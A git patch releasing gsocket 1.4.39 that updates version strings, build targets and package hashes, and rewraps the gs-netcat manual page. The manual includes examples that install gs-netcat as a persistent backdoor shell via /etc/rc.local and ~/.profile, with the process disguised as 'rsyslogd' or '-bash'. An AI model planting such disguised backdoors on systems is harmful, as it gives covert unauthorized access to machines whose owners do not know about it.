From cdfda3fdc9a231b24343b143d539e1e5ef07a60e Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Wed, 14 Dec 2022 15:04:27 +0000 Subject: [PATCH] v1.4.39 --- ChangeLog | 2 +- configure.ac | 4 +- deploy/deploy.sh | 5 +- packaging/deploy-all/mk_deploy-all.sh | 2 +- packaging/openwrt/gsocket/Makefile | 4 +- test-build/test-compile.sh | 5 +- tools/man_gs-netcat.h | 136 +++++++++++++------------- 7 files changed, 82 insertions(+), 76 deletions(-) diff --git a/ChangeLog b/ChangeLog index ecd57167..15e0eddb 100644 --- a/ChangeLog +++ b/ChangeLog @@ -1,4 +1,4 @@ -1.4.39-dev - 2022-09-01 +1.4.39 - 2022-09-01 * -t flag to check if peer is listening * Software emulation of PTY if /dev/ptmx is unavailable * Keepalive improved for Port 443 connections diff --git a/configure.ac b/configure.ac index 38385464..df63259a 100755 --- a/configure.ac +++ b/configure.ac @@ -1,6 +1,6 @@ dnl Process this File with autoconf to produce a configure script. AC_PREREQ([2.69]) -AC_INIT([gsocket],[1.4.39-dev4]) +AC_INIT([gsocket],[1.4.39]) AC_CONFIG_AUX_DIR(config) AC_CANONICAL_TARGET @@ -241,7 +241,7 @@ if test x"${STATIC}" = xyes; then * Your MUST compile OpenSSL like this: * * openssl-src> * * ./Configure --prefix=\$HOME/usr no-dso no-threads no-shared linux-generic64 * -* mkdir -p \$HOME/usr && make all install * +* mkdir -p \$HOME/usr && make install_sw * * Only then compile gsocket \(using the same --prefix=\): * * gsocket-src> ./configure --prefix=\$HOME/usr --enable-static * * gsocket-src> make all install * diff --git a/deploy/deploy.sh b/deploy/deploy.sh index 62a544ce..925699be 100755 --- a/deploy/deploy.sh +++ b/deploy/deploy.sh @@ -562,7 +562,8 @@ init_vars() elif [[ $OSTYPE == *FreeBSD* ]]; then OSARCH="x86_64-freebsd" elif [[ $OSTYPE == *cygwin* ]]; then - OSARCH="x86_64-cygwin" + OSARCH="i686-cygwin" + [[ "$arch" == "x86_64" ]] && OSARCH="x86_64-cygwin" # elif [[ $OSTYPE == *gnu* ]] && [[ "$(uname -v)" == *Hurd* ]]; then # OSARCH="i386-hurd" # debian-hurd fi @@ -1356,7 +1357,7 @@ try() # binaries and fail hard if none could be found. try_any() { - targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-cygwin x86_64-freebsd x86_64-osx" + targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-osx x86_64-cygwin i686-cygwin mips32-alpine mipsel32-alpine x86_64-freebsd" for osarch in $targets; do [[ "$osarch" = "$OSARCH" ]] && continue # Skip the default OSARCH (already tried) try "$osarch" diff --git a/packaging/deploy-all/mk_deploy-all.sh b/packaging/deploy-all/mk_deploy-all.sh index 60a9a46c..48eced57 100755 --- a/packaging/deploy-all/mk_deploy-all.sh +++ b/packaging/deploy-all/mk_deploy-all.sh @@ -7,7 +7,7 @@ BASEDIR="$(cd "$(dirname "${0}")/../../" || exit; pwd)" source "${BASEDIR}/packaging/build_funcs" -targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-cygwin x86_64-freebsd x86_64-osx mips32-alpine mips64-alpine mipsel32-alpine" +targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-osx x86_64-cygwin i686-cygwin mips64-alpine mips32-alpine mipsel32-alpine x86_64-freebsd" # targets="x86_64-alpine x86_64-osx" PKG_DIR="gs-pkg" diff --git a/packaging/openwrt/gsocket/Makefile b/packaging/openwrt/gsocket/Makefile index 1c1bd149..88f53825 100644 --- a/packaging/openwrt/gsocket/Makefile +++ b/packaging/openwrt/gsocket/Makefile @@ -1,12 +1,12 @@ include $(TOPDIR)/rules.mk PKG_NAME:=gsocket -PKG_VERSION:=1.4.39-dev3 +PKG_VERSION:=1.4.39 PKG_RELEASE:=1 PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.gz PKG_SOURCE_URL:=https://github.com/hackerschoice/gsocket/releases/download/v$(PKG_VERSION)/ -PKG_HASH:=240ee6f4b00d4e5e6de88b488c4a2982771343ad23fe6dddb6671d82d06127fc +PKG_HASH:=2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30 PKG_MAINTAINER:=Ralf Kaiser PKG_LICENSE:=BSD-2-Clause diff --git a/test-build/test-compile.sh b/test-build/test-compile.sh index 248c8187..47ac8cc6 100755 --- a/test-build/test-compile.sh +++ b/test-build/test-compile.sh @@ -23,7 +23,7 @@ DIR=$(echo "$FILE" | sed 's/\.tar\.gz//') echo "Using:" (cd "${TOPDIR}" && ls -al "$FILE" && sha256sum "$FILE") -targets+=("osx") +# targets+=("osx") targets+=("sid") targets+=("cygwin") targets+=("kali64") @@ -32,7 +32,8 @@ targets+=("arch32") targets+=("alpine64") targets+=("debian" "ubuntu") targets+=("centos" "linux32") -targets+=("fbsd" "bengal") +targets+=("fbsd") +targets+=("bengal") targets+=("rpi") targets+=("solaris11" "solaris10") targets+=("openwrt") diff --git a/tools/man_gs-netcat.h b/tools/man_gs-netcat.h index 75d55a47..fd880f03 100644 --- a/tools/man_gs-netcat.h +++ b/tools/man_gs-netcat.h @@ -1,9 +1,9 @@ const char *man_str = "\ -GS-NETCAT(1) General Commands Manual GS-NETCAT(1)\n\ +GS-NETCAT(1) General Commands Manual GS-NETCAT(1)\n\ \n\ NAME\n\ - gs-netcat – transfer data, forward traffic and execute commands on a remote\n\ - host. Securely.\n\ + gs-netcat – transfer data, forward traffic and execute commands on a\n\ + remote host. Securely.\n\ \n\ SYNOPSIS\n\ gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]\n\ @@ -17,11 +17,11 @@ DESCRIPTION\n\ workstation and another workstation on a different Local Area Network.\n\ \n\ It uses the Global Socket Relay Network (GSRN) instead of direct TCP\n\ - connections. Neither workstation needs to open a port in their firewall or\n\ - accept incoming TCP connections.\n\ + connections. Neither workstation needs to open a port in their firewall\n\ + or accept incoming TCP connections.\n\ \n\ - The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256 and\n\ - a 4096 Prime. The GSRN sees only the encrypted traffic.\n\ + The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256\n\ + and a 4096 Prime. The GSRN sees only the encrypted traffic.\n\ \n\ Common uses include:\n\ \n\ @@ -36,18 +36,20 @@ OPTIONS\n\ \n\ -d ip Destination IPv4 address for port forwarding.\n\ \n\ - -D Daemon & Watchdog mode. Start gs-netcat as a background process and\n\ - restart if killed.\n\ + -D Daemon & Watchdog mode. Start gs-netcat as a background process\n\ + and restart if killed.\n\ \n\ - -e cmd Execute command and send output to the connected client. Needs -l.\n\ + -e cmd Execute command and send output to the connected client. Needs\n\ + -l.\n\ \n\ - -g Generate a secure random password and output it to standard output.\n\ + -g Generate a secure random password and output it to standard\n\ + output.\n\ \n\ - -i Interactive login shell. The server spawns a true PTY login shell.\n\ - The client acts as a true PTY client (with Ctrl-C etc working). The\n\ - client can terminate the session by typing 'Ctrl-e q' at any time\n\ - or by typing 'exit'. The server supports multiple clients at the\n\ - same time.\n\ + -i Interactive login shell. The server spawns a true PTY login\n\ + shell. The client acts as a true PTY client (with Ctrl-C etc\n\ + working). The client can terminate the session by typing 'Ctrl-e\n\ + q' at any time or by typing 'exit'. The server supports multiple\n\ + clients at the same time.\n\ \n\ -k file\n\ A file containing the password.\n\ @@ -62,8 +64,8 @@ OPTIONS\n\ \n\ -q Quiet mode. Do not output any warnings or errors.\n\ \n\ - -r Receive-only. Do not send any data. Terminate when no more data is\n\ - available for reading.\n\ + -r Receive-only. Do not send any data. Terminate when no more data\n\ + is available for reading.\n\ \n\ -s secret\n\ A password chosen by the user. Both users need to use the same\n\ @@ -73,9 +75,9 @@ OPTIONS\n\ proxy. It allows multiple gs-netcat clients to (securely) relay\n\ traffic via the server. Needs -l.\n\ \n\ - -T Use TOR. The gs-netcat tool will connect via TOR to the GSRN. This\n\ - requires TOR to be installed and running. The IP and PORT of the\n\ - TOR server can be set using environment variables.\n\ + -T Use TOR. The gs-netcat tool will connect via TOR to the GSRN.\n\ + This requires TOR to be installed and running. The IP and PORT of\n\ + the TOR server can be set using environment variables.\n\ \n\ -t Connect to the GSRN (only) and check if the peer is listening. Do\n\ not connect the peer.\n\ @@ -88,9 +90,9 @@ OPTIONS\n\ -w Client to wait for the listening server to become available.\n\ \n\ CONSOLE\n\ - The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-e\n\ - c' (e for EEEElite) opens the command console. The command console displays\n\ - the following information:\n\ + The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-\n\ + e c' (e for EEEElite) opens the command console. The command console\n\ + displays the following information:\n\ \n\ • Latency (in milliseconds) to the remote host\n\ • Warning when a user logs into the system or becomes active\n\ @@ -99,30 +101,30 @@ CONSOLE\n\ Type 'help' for a list of available commands.\n\ \n\ FILETRANSFER\n\ - File transfer is available from the command console. Files are transferred\n\ - with the permission and modification timestamp unchanged. Partially\n\ - transferred files are re-started where the transfer was left off. The\n\ - 'put' command is used for uploading:\n\ + File transfer is available from the command console. Files are\n\ + transferred with the permission and modification timestamp unchanged.\n\ + Partially transferred files are re-started where the transfer was left\n\ + off. The 'put' command is used for uploading:\n\ put foobar.txt\n\ put $HOME/foobar.txt\n\ put /tmp/*.log\n\ put $(find. -type f -name '*.c')\n\ - (The above example shows Shell Variable substitution and word expansion) It\n\ - is possible to limit the amount of path information that is sent as implied\n\ - directories for each path you specify. You can insert a dot and a slash\n\ - into the source path, like this:\n\ + (The above example shows Shell Variable substitution and word expansion)\n\ + It is possible to limit the amount of path information that is sent as\n\ + implied directories for each path you specify. You can insert a dot and a\n\ + slash into the source path, like this:\n\ put /foo/./bar/baz.c\n\ - That would create /tmp/bar/baz.c on the remote machine. The 'get' command\n\ - is used for downloading:\n\ + That would create /tmp/bar/baz.c on the remote machine. The 'get'\n\ + command is used for downloading:\n\ get foobar.txt\n\ get $(find /var/./ -name '*.log')\n\ - Transferring a directory automatically transfers all files and directories\n\ - within that directory (recursively):\n\ + Transferring a directory automatically transfers all files and\n\ + directories within that directory (recursively):\n\ get /var/log\n\ get /\n\ The first command transfers all directories and files in /var/log/*. The\n\ - latter command transfers the entire filesystem. Multiple get/put commands\n\ - can be scheduled at the same time.\n\ + latter command transfers the entire filesystem. Multiple get/put\n\ + commands can be scheduled at the same time.\n\ \n\ EXAMPLES\n\ Example 1 - Listen for a new connection using the password 'MySecret':\n\ @@ -167,8 +169,8 @@ EXAMPLES\n\ Example 6 - TCP Port Forward all connections to 192.168.6.7:22. Server:\n\ $ gs-netcat -s MySecret -l -d 192.168.6.7 -p 22\n\ \n\ - Client to listen on TCP port 2222 and forward any new connection to the the\n\ - server. The server then forwards the connection to 192.168.6.7:22.\n\ + Client to listen on TCP port 2222 and forward any new connection to the\n\ + the server. The server then forwards the connection to 192.168.6.7:22.\n\ $ gs-netcat -s MySecret -p 2222\n\ $ ssh -p 2222 root@127.0.0.1\n\ \n\ @@ -180,8 +182,8 @@ EXAMPLES\n\ \n\ The sftp-server binary speaks the sftp-protocol to stdin/stdout. The sftp\n\ binary also speaks sftp-protocol to stdin/stdout. The tool can be used to\n\ - connect both via GSRN (encrypted) and access the SFTP server running on the\n\ - server's side from the client via the GSRN (encrypted).:\n\ + connect both via GSRN (encrypted) and access the SFTP server running on\n\ + the server's side from the client via the GSRN (encrypted).:\n\ $ export GSOCKET_ARGS='-s MySecret'\n\ $ sftp -D gs-netcat\n\ \n\ @@ -195,12 +197,13 @@ EXAMPLES\n\ SHELL=\"/bin/bash\" /bin/bash -c \"cd $HOME; exec -a rsyslogd\n\ /usr/local/bin/gs-netcat\"\n\ \n\ - The following line in /etc/rc.local starts a port-forward to 127.0.0.1:22:\n\ - GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec -a\n\ - rsyslogd /usr/local/bin/gs-netcat\"\n\ + The following line in /etc/rc.local starts a port-forward to\n\ + 127.0.0.1:22:\n\ + GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec\n\ + -a rsyslogd /usr/local/bin/gs-netcat\"\n\ \n\ - The following line in the user's ~/.profile starts the backdoor (once) when\n\ - the user logs in. All in one line:\n\ + The following line in the user's ~/.profile starts the backdoor (once)\n\ + when the user logs in. All in one line:\n\ killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s MySecret3\n\ -liqD\" SHELL=/bin/bash exec -a -bash /usr/local/bin/gs-netcat)\n\ \n\ @@ -216,8 +219,8 @@ ENVIRONMENT\n\ gs-netcat\n\ \n\ GSOCKET_SOCKS_IP\n\ - Specify the IP address of the TOR server (or any other SOCKS server).\n\ - Use together with -T. Default is 127.0.0.1.\n\ + Specify the IP address of the TOR server (or any other SOCKS\n\ + server). Use together with -T. Default is 127.0.0.1.\n\ \n\ GSOCKET_SOCKS_PORT\n\ The port number of the TOR server (or any other SOCKS server). Use\n\ @@ -237,34 +240,35 @@ SECURITY\n\ $ export GSOCKET_ARGS=\"-s MySecret\"\n\ $ gs-netcat\n\ \n\ - 1. The security is end-2-end. This means from User-2-User (and not just to\n\ - the GSRN). The GSRN relays only (encrypted) data to and from the users.\n\ + 1. The security is end-2-end. This means from User-2-User (and not just\n\ + to the GSRN). The GSRN relays only (encrypted) data to and from the\n\ + users.\n\ \n\ - 2. The session is 256 bit and ephemeral. It is freshly generated for every\n\ - session and generated randomly (and is not based on the password). It uses\n\ - OpenSSL's SRP with AES-256 and a 4096 Prime.\n\ + 2. The session is 256 bit and ephemeral. It is freshly generated for\n\ + every session and generated randomly (and is not based on the password).\n\ + It uses OpenSSL's SRP with AES-256 and a 4096 Prime.\n\ \n\ 3. The password can be 'weak' without weakening the security of the\n\ session. A brute force attack against a weak password requires a new TCP\n\ connection for every guess.\n\ \n\ 4. Do not use stupid passwords like 'password123'. Malice might pick the\n\ - same (stupid) password by chance and connect. If in doubt use gs-netcat -g\n\ - to generate a strong one. Alice's and Bob's password should at least be\n\ - strong enough so that Malice can not guess it by chance while Alice is\n\ + same (stupid) password by chance and connect. If in doubt use gs-netcat\n\ + -g to generate a strong one. Alice's and Bob's password should at least\n\ + be strong enough so that Malice can not guess it by chance while Alice is\n\ waiting for Bob to connect.\n\ \n\ - 5. If Alice shares the same password with Bob and Charlie and either one of\n\ - them connects then Alice can not tell if it is Bob or Charlie who\n\ + 5. If Alice shares the same password with Bob and Charlie and either one\n\ + of them connects then Alice can not tell if it is Bob or Charlie who\n\ connected.\n\ \n\ 6. Assume Alice shares the same password with Bob and Malice. When Alice\n\ - stops listening for a connection then Malice could start to listen for the\n\ - connection instead. Bob (when opening a new connection) can not tell if he\n\ - is connecting to Alice or to Malice. Use -a if you worry about\n\ - this. TL;DR: When sharing the same password with a group larger than 2 then\n\ - it is assumed that everyone in that group plays nicely. Otherwise use SSH\n\ - over the GS/TLS connection.\n\ + stops listening for a connection then Malice could start to listen for\n\ + the connection instead. Bob (when opening a new connection) can not tell\n\ + if he is connecting to Alice or to Malice. Use -a if you worry\n\ + about this. TL;DR: When sharing the same password with a group larger\n\ + than 2 then it is assumed that everyone in that group plays nicely.\n\ + Otherwise use SSH over the GS/TLS connection.\n\ \n\ 7. SRP has Perfect Forward Secrecy. This means that past sessions can not\n\ be decrypted even if the password becomes known.\n\ @@ -282,5 +286,5 @@ BUGS\n\ whatever circumstances, please notify me (skyper@thc.org) and tell me how\n\ you think it should behave.\n\ \n\ -macOS 12.5 October 8, 2020 macOS 12.5\n\ +macOS 13.0 October 8, 2020 macOS 13.0\n\ ";